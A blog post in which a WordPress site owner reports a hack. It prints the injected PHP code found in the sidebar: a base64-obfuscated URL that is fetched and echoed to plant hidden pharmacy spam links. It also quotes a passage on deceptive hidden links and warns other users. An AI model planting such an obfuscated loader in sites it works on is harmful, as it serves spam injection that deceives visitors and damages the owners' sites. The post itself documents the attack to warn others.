Hackers Everywhere - Yes, we got Hacked!

$str1 = 'aHR0cDovL2NkdC5vcmcvc2VhcmNoL3NlYXJjaGRhdGEvdGVtcGxhdGVzL3N0eWxlLmh0bQ==';
$content=file_get_contents(base64_decode($str1),FALSE);
echo $content; ?>

Thats the PHP code some idiot or robot or whatever left under my sidebar.php page. This code was not exactly malicious in terms of making y’all download a virus or trojan but it did put up 30 links to some pharmacy/health websites. This type of practise usually results in you getting dropped from search engines or getting banned for a long, long time. Furthermore, it costs $45 a month to advertise on this blog

How I Noticed The “Hack”:

If you visited our blog today you would have no doubt seen all our adsense ads about “Phentirimine” which is some pill I assume for loosing weight. This normally means that somewhere I must have mentioned Phentirimine a heck of a lot and not only on the front page but everywhere. Therefore I checked the page source for sweethacks and voila there is about 30 links to some spam website (health/pharmacy).

If you see your ads change then you too should check your page source too. What made this hack/injection more brilliant in a way is that it used a PHP call up code to make it look less noticeable. A webmaster new to all of this would have never noticed this until he literally got dropped from search engines. In my case, the CSS was used to make the links tiny so it was not noticeable on the main website.

Google does not like hidden links.

Here is an example taken from Matt Cutts Blog:

You see the two normal hyperlinks, right? Do you see any other links in this paragraph? A user wouldn?t see any other links, even if they moused over every word in the paragraph. But if you happened to click on just the right word, you?d get whisked away to a hardcore porn site. Here, I?ll show you what you?d see in the instant after clicking on the hidden link, right before you head to the porn site:

See how the word ?mission? has a little box around it? It?s a hidden link. If you view the source of the page, here?s what you?ll see. I?ve highlighted the relevant link:

Someone went to a fair amount of trouble to hide the porn site link. The status bar gets set to empty using the onMouseOver action, so when you mouse over the link, you don?t see that it goes anywhere. And the style of the link is set so that the cursor doesn?t change when you mouse over the link as well. In my opinion, this is a good example of a link that crosses over into deceptiveness and violates our quality guidelines.

…Read More Here.

So Google does not like and I certainly do not like it. Perhaps it was because I did not update my wordpress frequently but I will be changing a lot of things and have already implemented new security measures to prevent this from happening again.

You’ve been warned folks (wordpress users)

Btw, have you entered our contest yet? You could win $1300 worth of value including money!